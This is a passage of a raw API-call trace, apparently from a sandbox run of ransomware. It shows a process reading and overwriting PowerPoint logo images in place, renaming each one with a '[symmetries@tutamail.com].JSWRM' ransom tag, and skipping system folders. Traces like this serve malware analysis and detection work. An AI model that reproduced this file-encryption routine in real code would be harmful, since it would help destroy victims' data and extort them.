(lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\PowerPntLogo.scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\powerpntlogo.scale-140.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.699] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2847) returned 1 [0133.700] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.700] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xb10, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xb10, lpOverlapped=0x0) returned 1 [0133.701] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.701] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xb10, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xb10, lpOverlapped=0x0) returned 1 [0133.702] CloseHandle (hObject=0x238) returned 1 [0133.702] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\PowerPntLogo.scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\powerpntlogo.scale-140.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\PowerPntLogo.scale-140.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\powerpntlogo.scale-140.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.703] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a7702aa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a7702aa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a7702aa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd87, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="PowerPntLogo.scale-180.png", cAlternateFileName="PODF31~1.PNG")) returned 1 [0133.703] lstrcmpiW (lpString1="PowerPntLogo.scale-180.png", lpString2=".") returned 1 [0133.703] lstrcmpiW (lpString1="PowerPntLogo.scale-180.png", lpString2="..") returned 1 [0133.703] lstrcmpiW (lpString1="PowerPntLogo.scale-180.png", lpString2="...") returned 1 [0133.703] lstrcmpiW (lpString1="PowerPntLogo.scale-180.png", lpString2="windows") returned -1 [0133.703] lstrcmpiW (lpString1="PowerPntLogo.scale-180.png", lpString2="recovery") returned -1 [0133.703] lstrcmpiW (lpString1="PowerPntLogo.scale-180.png", lpString2="perflogs") returned 1 [0133.703] lstrcmpiW (lpString1="PowerPntLogo.scale-180.png", lpString2="documents and settings") returned 1 [0133.703] lstrcmpiW (lpString1="PowerPntLogo.scale-180.png", lpString2="$RECYCLE.BIN") returned 1 [0133.703] lstrcmpiW (lpString1="PowerPntLogo.scale-180.png", lpString2="system volume information") returned -1 [0133.703] lstrcmpiW (lpString1="PowerPntLogo.scale-180.png", lpString2="msocache") returned 1 [0133.703] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogo.scale-180.png", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0133.703] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogo.scale-180.png", cchWideChar=26, lpMultiByteStr=0x240f48, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPntLogo.scale-180.png", lpUsedDefaultChar=0x0) returned 26 [0133.703] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogo.scale-180.png", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0133.703] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogo.scale-180.png", cchWideChar=26, lpMultiByteStr=0x241358, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPntLogo.scale-180.png", lpUsedDefaultChar=0x0) returned 26 [0133.703] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.703] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.703] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\PowerPntLogo.scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\powerpntlogo.scale-180.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.704] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3463) returned 1 [0133.704] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.704] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xd80, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xd80, lpOverlapped=0x0) returned 1 [0133.716] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.716] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xd80, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xd80, lpOverlapped=0x0) returned 1 [0133.717] CloseHandle (hObject=0x238) returned 1 [0133.717] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\PowerPntLogo.scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\powerpntlogo.scale-180.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\PowerPntLogo.scale-180.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\powerpntlogo.scale-180.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.718] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a7702aa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a7702aa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a7702aa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7e7, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="PowerPntLogo.scale-80.png", cAlternateFileName="PO0348~1.PNG")) returned 1 [0133.718] lstrcmpiW (lpString1="PowerPntLogo.scale-80.png", lpString2=".") returned 1 [0133.718] lstrcmpiW (lpString1="PowerPntLogo.scale-80.png", lpString2="..") returned 1 [0133.718] lstrcmpiW (lpString1="PowerPntLogo.scale-80.png", lpString2="...") returned 1 [0133.718] lstrcmpiW (lpString1="PowerPntLogo.scale-80.png", lpString2="windows") returned -1 [0133.718] lstrcmpiW (lpString1="PowerPntLogo.scale-80.png", lpString2="recovery") returned -1 [0133.718] lstrcmpiW (lpString1="PowerPntLogo.scale-80.png", lpString2="perflogs") returned 1 [0133.718] lstrcmpiW (lpString1="PowerPntLogo.scale-80.png", lpString2="documents and settings") returned 1 [0133.718] lstrcmpiW (lpString1="PowerPntLogo.scale-80.png", lpString2="$RECYCLE.BIN") returned 1 [0133.718] lstrcmpiW (lpString1="PowerPntLogo.scale-80.png", lpString2="system volume information") returned -1 [0133.718] lstrcmpiW (lpString1="PowerPntLogo.scale-80.png", lpString2="msocache") returned 1 [0133.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogo.scale-80.png", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0133.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogo.scale-80.png", cchWideChar=25, lpMultiByteStr=0x2410d8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPntLogo.scale-80.png", lpUsedDefaultChar=0x0) returned 25 [0133.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogo.scale-80.png", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0133.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogo.scale-80.png", cchWideChar=25, lpMultiByteStr=0x240ef8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPntLogo.scale-80.png", lpUsedDefaultChar=0x0) returned 25 [0133.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.718] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\PowerPntLogo.scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\powerpntlogo.scale-80.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.719] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2023) returned 1 [0133.719] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.719] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x7e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x7e0, lpOverlapped=0x0) returned 1 [0133.721] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.721] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x7e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x7e0, lpOverlapped=0x0) returned 1 [0133.721] CloseHandle (hObject=0x238) returned 1 [0133.721] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\PowerPntLogo.scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\powerpntlogo.scale-80.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\PowerPntLogo.scale-80.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\powerpntlogo.scale-80.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.722] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a7e29bd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a7e29bd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a7e29bd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x70a, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="PowerPntLogoSmall.contrast-black_scale-100.png", cAlternateFileName="PO798C~1.PNG")) returned 1 [0133.722] lstrcmpiW (lpString1="PowerPntLogoSmall.contrast-black_scale-100.png", lpString2=".") returned 1 [0133.722] lstrcmpiW (lpString1="PowerPntLogoSmall.contrast-black_scale-100.png", lpString2="..") returned 1 [0133.723] lstrcmpiW (lpString1="PowerPntLogoSmall.contrast-black_scale-100.png", lpString2="...") returned 1 [0133.723] lstrcmpiW (lpString1="PowerPntLogoSmall.contrast-black_scale-100.png", lpString2="windows") returned -1 [0133.723] lstrcmpiW (lpString1="PowerPntLogoSmall.contrast-black_scale-100.png", lpString2="recovery") returned -1 [0133.723] lstrcmpiW (lpString1="PowerPntLogoSmall.contrast-black_scale-100.png", lpString2="perflogs") returned 1 [0133.723] lstrcmpiW (lpString1="PowerPntLogoSmall.contrast-black_scale-100.png", lpString2="documents and settings") returned 1 [0133.723] lstrcmpiW (lpString1="PowerPntLogoSmall.contrast-black_scale-100.png", lpString2="$RECYCLE.BIN") returned 1 [0133.723] lstrcmpiW (lpString1="PowerPntLogoSmall.contrast-black_scale-100.png", lpString2="system volume information") returned -1 [0133.723] lstrcmpiW (lpString1="PowerPntLogoSmall.contrast-black_scale-100.png", lpString2="msocache") returned 1 [0133.723] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogoSmall.contrast-black_scale-100.png", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0133.723] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogoSmall.contrast-black_scale-100.png", cchWideChar=46, lpMultiByteStr=0x22cdc8, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPntLogoSmall.contrast-black_scale-100.png", lpUsedDefaultChar=0x0) returned 46 [0133.723] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogoSmall.contrast-black_scale-100.png", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0133.723] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogoSmall.contrast-black_scale-100.png", cchWideChar=46, lpMultiByteStr=0x22ce70, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPntLogoSmall.contrast-black_scale-100.png", lpUsedDefaultChar=0x0) returned 46 [0133.724] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.724] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.724] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\PowerPntLogoSmall.contrast-black_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\powerpntlogosmall.contrast-black_scale-100.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.724] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1802) returned 1 [0133.724] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.724] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x700, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x700, lpOverlapped=0x0) returned 1 [0133.726] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.726] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x700, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x700, lpOverlapped=0x0) returned 1 [0133.726] CloseHandle (hObject=0x238) returned 1 [0133.726] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\PowerPntLogoSmall.contrast-black_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\powerpntlogosmall.contrast-black_scale-100.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\PowerPntLogoSmall.contrast-black_scale-100.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\powerpntlogosmall.contrast-black_scale-100.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.727] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a7702aa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a7702aa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a79652b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x802, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="PowerPntLogoSmall.contrast-black_scale-140.png", cAlternateFileName="PO54A4~1.PNG")) returned 1 [0133.727] lstrcmpiW (lpString1="PowerPntLogoSmall.contrast-black_scale-140.png", lpString2=".") returned 1 [0133.728] lstrcmpiW (lpString1="PowerPntLogoSmall.contrast-black_scale-140.png", lpString2="..") returned 1 [0133.728] lstrcmpiW (lpString1="PowerPntLogoSmall.contrast-black_scale-140.png", lpString2="...") returned 1 [0133.728] lstrcmpiW (lpString1="PowerPntLogoSmall.contrast-black_scale-140.png", lpString2="windows") returned -1 [0133.728] lstrcmpiW (lpString1="PowerPntLogoSmall.contrast-black_scale-140.png", lpString2="recovery") returned -1 [0133.728] lstrcmpiW (lpString1="PowerPntLogoSmall.contrast-black_scale-140.png", lpString2="perflogs") returned 1 [0133.728] lstrcmpiW (lpString1="PowerPntLogoSmall.contrast-black_scale-140.png", lpString2="documents and settings") returned 1 [0133.728] lstrcmpiW (lpString1="PowerPntLogoSmall.contrast-black_scale-140.png", lpString2="$RECYCLE.BIN") returned 1 [0133.728] lstrcmpiW (lpString1="PowerPntLogoSmall.contrast-black_scale-140.png", lpString2="system volume information") returned -1 [0133.728] lstrcmpiW (lpString1="PowerPntLogoSmall.contrast-black_scale-140.png", lpString2="msocache") returned 1 [0133.728] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogoSmall.contrast-black_scale-140.png", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0133.728] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogoSmall.contrast-black_scale-140.png", cchWideChar=46, lpMultiByteStr=0x22d260, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPntLogoSmall.contrast-black_scale-140.png", lpUsedDefaultChar=0x0) returned 46 [0133.728] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogoSmall.contrast-black_scale-140.png", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0133.728] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogoSmall.contrast-black_scale-140.png", cchWideChar=46, lpMultiByteStr=0x22cdc8, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPntLogoSmall.contrast-black_scale-140.png", lpUsedDefaultChar=0x0) returned 46 [0133.728] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.728] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.728] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\PowerPntLogoSmall.contrast-black_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\powerpntlogosmall.contrast-black_scale-140.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.729] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2050) returned 1 [0133.729] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.729] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x800, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x800, lpOverlapped=0x0) returned 1 [0133.731] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.731] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x800, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x800, lpOverlapped=0x0) returned 1 [0133.731] CloseHandle (hObject=0x238) returned 1 [0133.731] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\PowerPntLogoSmall.contrast-black_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\powerpntlogosmall.contrast-black_scale-140.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\PowerPntLogoSmall.contrast-black_scale-140.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\powerpntlogosmall.contrast-black_scale-140.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.732] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a79652b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a79652b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a79652b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x9d1, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="PowerPntLogoSmall.contrast-black_scale-180.png", cAlternateFileName="PO12D5~1.PNG")) returned 1 [0133.732] lstrcmpiW (lpString1="PowerPntLogoSmall.contrast-black_scale-180.png", lpString2=".") returned 1 [0133.732] lstrcmpiW (lpString1="PowerPntLogoSmall.contrast-black_scale-180.png", lpString2="..") returned 1 [0133.732] lstrcmpiW (lpString1="PowerPntLogoSmall.contrast-black_scale-180.png", lpString2="...") returned 1 [0133.732] lstrcmpiW (lpString1="PowerPntLogoSmall.contrast-black_scale-180.png", lpString2="windows") returned -1 [0133.732] lstrcmpiW (lpString1="PowerPntLogoSmall.contrast-black_scale-180.png", lpString2="recovery") returned -1 [0133.732] lstrcmpiW (lpString1="PowerPntLogoSmall.contrast-black_scale-180.png", lpString2="perflogs") returned 1 [0133.732] lstrcmpiW (lpString1="PowerPntLogoSmall.contrast-black_scale-180.png", lpString2="documents and settings") returned 1 [0133.732] lstrcmpiW (lpString1="PowerPntLogoSmall.contrast-black_scale-180.png", lpString2="$RECYCLE.BIN") returned 1 [0133.732] lstrcmpiW (lpString1="PowerPntLogoSmall.contrast-black_scale-180.png", lpString2="system volume information") returned -1 [0133.732] lstrcmpiW (lpString1="PowerPntLogoSmall.contrast-black_scale-180.png", lpString2="msocache") returned 1 [0133.732] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogoSmall.contrast-black_scale-180.png", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0133.732] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogoSmall.contrast-black_scale-180.png", cchWideChar=46, lpMultiByteStr=0x22d260, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPntLogoSmall.contrast-black_scale-180.png", lpUsedDefaultChar=0x0) returned 46 [0133.732] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogoSmall.contrast-black_scale-180.png", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0133.733] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogoSmall.contrast-black_scale-180.png", cchWideChar=46, lpMultiByteStr=0x22cdc8, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPntLogoSmall.contrast-black_scale-180.png", lpUsedDefaultChar=0x0) returned 46 [0133.733] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) 